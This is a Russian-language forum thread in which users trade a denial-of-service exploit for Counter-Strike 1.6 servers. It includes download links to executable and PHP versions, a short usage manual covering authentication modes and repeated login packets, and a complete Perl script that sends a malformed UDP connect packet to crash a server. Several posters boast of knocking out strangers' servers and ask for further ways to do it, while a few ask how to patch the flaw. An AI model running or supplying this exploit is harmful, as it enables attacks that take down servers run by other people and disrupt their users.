Counter-Strike Dos exploit
 

Counter-Strike 1.6 Dos exploit

Баг был найден небезызвестным хакером FUF`ом,имже и была написана exe версия.Мной был написан эксплоит на php.

Сплоит валит кс и очень сильно грузит систему.

Возможность указать пароль

Кароче,в архиве уже есть информация по испльзованию гуи версии,с php примерно все также.

Бывает что валится не с первого раза,но валит все 100 процентов серверов.Ну или стоит поменять тип авторизации на двойку

http://www.mytempdir.com/953029

Низнаю покозалось интересным вот и переёс , если не понравится модеры можите вернуть назад.

Фигасе ФУФик отжег =\

Сплоит в паблике уже довольно давно. Тот, что на перле. Работает на ура, как утверждает автор сплоита на cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server. Пользуюусь довольно давно в локалке, единственный минус - для удачной работы сплоита на сервере долно быть хоть одно свободное место. (а на больших общих и популярных серваках это бывает проблемой)

сплоит не перле валит серваки через кривой сд`кей.. тем более 28пачт (локал) закрывает эту багу.. а здесь бага в кривом нике.. гема сказал, что бага в нике с точками.. и не имеет ничего общего с перловым сплоитом..
зы. может вернете темку наверх, все равно паблик?

пардон конечно, гляну седня вечерком принцип работы. в общем все-равно главная проблема - залететь на серв, а если он забит, то только бесконечным циклом можно попытаться дождаться слота.

насколько помню, то сабж в паблике уже более полугода и работает для КС не старше 26 пат4а (у меня, например, 28ой стоит)

Я уже задолбался говорить что эти баги разные.Тот сплоит основан на пустых полях,этот на нике.

В локалке не сработал (бинарник) , хотя перловый работаетн а ура. Ошибка [1], неверные данные, пасс оставил, чтобы проигнорировался потом, пробовал убрать пасс, все равно..

Такой минимануал по exe версии.

Некоторые серверы падают после двойной посылки логин пакета.Следовательно 2 раза жмем Send ( недоработка Фуфа )

Пасс должен быть введен обязательно.Любой.Ествеств ено,если сервер защищен паролем,то надо вводить именно тот которым и защищен :)

Аторизация бывает двух типов - два и четыре.Попробуйте менять режимы во время досинга серверов.

Еще,как вариант - требуется наличие лицензионного cd кея.К сожалению мы не нашли такого спонсора и пришлось вбить первый попавшийся пиратский.Считайте это как руководство к доработке вами самими )

Я валил все серваки.ПО у всех одно,патч так еще и не выпустили так как эксплоит не получил массового распространения и в valve еще о нем не знают.Патч на старый pl сплоит вышел через нескольк месяцев после эксплоита.

Для более продвинутых советую запустить снифер и посмотреть последний пакет ответа от сервера.Если подклчение прошло успешно,вы увидете там свой ip адрес.В ином случае ответ будет варьироваться от ошибки - "BAD PASSWORD","INVALID AUTH TYPE" и прочее.

Вообщем,дерзайте и все у вас получится.Если не верите в работоспособность - в личку отправьте мне адрес и я скажу что надо делать "чтобы все было".

С php версией примерно все также,за исключением того,что сплоит итак логинится два раза.Разве что какая то ошибка и вам надо попробовать еще раз.

"Ошибка [1], неверные данные"
Возникает, когда от сервера не было получино ответа на пакет запроса информации, либо, когда ответ пришел, но явно не от кс сервера. Надо проверить ип и порт, а также посмотреть, коннектится ли сам кс к серверу =)

"хотя перловый работаетн а ура"
Еще и еще раз - стим патчи исправляют все баги, которые юзает перл скрипт. От сабжевого слпоита же пока что ничего не помогает.

Говорите, что у вас сплоит не работает, только если пишет rejected - сервер не принял эксплоит, но помните, перед падением сервер выдает эксплоиту такие ответы... и падает

сплойт нормально ведет себя на nosteam? 28 patch?

хз, последний (ПОСЛЕДНИЙ, дада) патч исправил проблему=)
лучше взять и проверить, а заодно запостить где еще он работает)
из того, что народ, что я знаю валил, теперь не падает ничего

подскажите плз как исправить проблему в случае втором?
вроде от первого избавился, но второй уже задолбал.

Кароче проверял эти два эксплоита (перловский и экзешник) на патчах 7, 19, 28.
от перловского зависают 7 и 19
от экзешника 19 и 28
кароче от клиента приходит запрос на подключение вот с таким именем Born to be pig (..)(1)(HLTV)() и сервер подыхает.
может кто подскажет как исправить багу? :mad: :mad: :mad:

все работает! респект автору!!! не пробуйте на localhost!

как сменить метод аутентификации 4
на 2
что поменять надо?
тупо сменить 4 на 2 не катит

Дай те где скачать этот сплойт а то с того хостинга удалили

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

Щас попробуем)

да это тот же самый сплоит, на который линки на первой странице лежат :)

пысы: ступил все-таки, проснулся тока... на эксплоит.ин этот ... валялся в вышеперечисленной сцылке, я не прочитал толком =\

у меня писал, что лажа с сокетами. я перекуярил на
и теперь пишет, что CD-key инвалидный)
че делать? Может это я накосячил со своими доработками?)

Наш сплоит и это старье на перле не путать какой раз уже пишу.а наш х3 где теперь если отыщу бекапы выложу.

Поищи плз. А то перловским я даж свой задосить не смог, а он уж не особо патченный.

откопал... ;)
труевый линк:
http://h1.jino-net.ru/cs.txt

а от этого скрипта какие-то обновления спасают?
я пробовал на линуксовом серваке nо steam (вроде 28 или 29)....

есть ещё способы хлопнуть кс сервак?

обновлений этого скрипта не было? чтоб валить последние версии кс

я не понял, с какими параметрами его надо запускаь?
и еще, песторасполож. влияеет на работу скрипта?

http://underwater.xtoolz.ru/cs-exploit/cs-exploit.php

Парни дайте плиз ссылку на *.exe - шник

ПЛИЗ

http://anonymous.h17.ru/CSHack.exe - качай :)

После установки 28 патча на сервере эта фича не работает, а так серваки только так летали ;)

И плюсик пажалста.

http://underwater.xtoolz.ru/projects/cs/

Крутая штука. Exe версией завалил 4 сервака, притом своего провайдера.

Мда. Валится серв, который я обновлял неделю назад, 28 патч nosteam. Чем закрыть, кто-нить знает?

UPD. решение найдено, но пока не тестил.

http://ipb.cs-online.ru/index.php?showtopic=895

И кто же сможет устоять от Спрута? =\

29 pach Ставить)

Нет, это против отсылки точек в имени, т.е. Fuf'а. А что за спрут?

Апд.

Блин, хз какой патч, но обновлял, скачивая сервер с оффа. Так что валится и последняя но-стим версия((

Там не в точках дело и серваки опять же валятся если немного подредактировать сплоит.Кстати,используя обычный брут пароля даже имхо к несуществующему нику - огромная нагрузка на сервер , игра становится пошаговой стратегией

Гем.....идея норм=)
Можно я напишу досер по бруту пароля?)

А для чего крушить КС то :?